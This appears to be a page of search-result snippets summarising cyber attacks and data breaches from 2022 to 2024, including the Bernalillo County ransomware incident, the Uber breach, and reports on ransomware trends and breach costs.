3. Bernalillo County, New Mexico: This was one of the first big attacks in 2022. On January 5, the largest county in New Mexico discovered that it had become the victim of a paralysing ransomware attack, taking several county departments and government offices offline. The county officials, however, said that they made no ransom payment to the ...
Recent Cyber Attacks, Data Breaches & Ransomware Attacks: August 2022
A list of cyber incidents that occurred across the world in August 2022, with prevention and response strategies. The incidents include phishing, hacking, data exposure, ransomware, insider threat and vulnerabilities.
The Devastating Business Impacts of a Cyber Breach
Anton Petrus/Getty Images. Summary. Cybersecurity risks are becoming more systematic and more severe. Although the short-term impacts of a cyberattack on a business are quite severe, the long-term ...
Uber Cyber-Attack: A Live Timeline
16th September-2022: After Uber took its internal software tools offline due to the cyber attack, it gradually started bringing them online. In a statement, the company stated: "Internal software tools that we took down as a precaution yesterday are coming back online this morning.".
Top Cyber Attacks of 2022
Taking a Look at Uber, Optus, Rockstar Games, and Other Major Cybersecurity Events. 2022 was an all-around rollercoaster, and it was no different in the world of cybersecurity. Some of the biggest cyber attacks in recent memory occurred this year, as threat actors got slicker and their methods more sophisticated.
Uber Data Breach: What To Know About the 2022 Cybersecurity Attack
No matter how robust network security is, even the biggest companies fall victim to cyber attacks. These malicious attacks can be costly — to the tune of 4.3 million on average — but they also disrupt operations and hurt a company's reputation.. In fact, it is anticipated that cybercrime will cost the world $10.5 trillion annually by 2025. A recent breach at Uber reminds us of how social ...
Hotel Industry Cyber Update
Hospitality companies also retain employee data, trade secrets and suppliers' bank information. 1 This data makes hotels a valuable target for cybercriminals. Ponemon and IBM Security's 2022 global case study report 2 revealed that $2.94 million was the average total cost of a data breach in the hospitality industry from 2021 to 2022.
Report: Attacks Surge With Critical Infrastructure Under Siege
KnowBe4, a leading provider of security awareness training and simulated phishing, recently released its latest report, Cyber Attacks On Infrastructure: The New Geopolitical Weapon. The report examines the growing threat of cyberattacks on critical infrastructure and provides insight into safeguarding against these potentially devastating attacks.
Cyber threats that shaped the first half of 2024
Technology - Researchers found a 12.75% decrease (from H1 2023) in database leaks and ransomware attacks targeting technology companies. "The first half of 2024 has painted a concerning ...
Next-Generation Attacks, Same Targets
The gig economy meets the next generation of cyber attacks. New attacks require new defense strategies. Phishing-Resistant MFA Adoption is critical and no longer a nice to have. With phishing attacks as the top cyber threat for enterprises, legacy MFA is being proven increasingly inadequate as the numbers of victims substantiate.
Ransomware attacks continue to increase in the US, UK, and Canada
That's the reality of a ransomware attack—and paying the ransom doesn't guarantee you'll get your data back. In many cases, victims who pay the ransom never receive the promised decryption key. The rise of ransomware in 2024 . Ransomware attacks are on the rise, with a notable 24% increase in the second quarter of 2024 alone.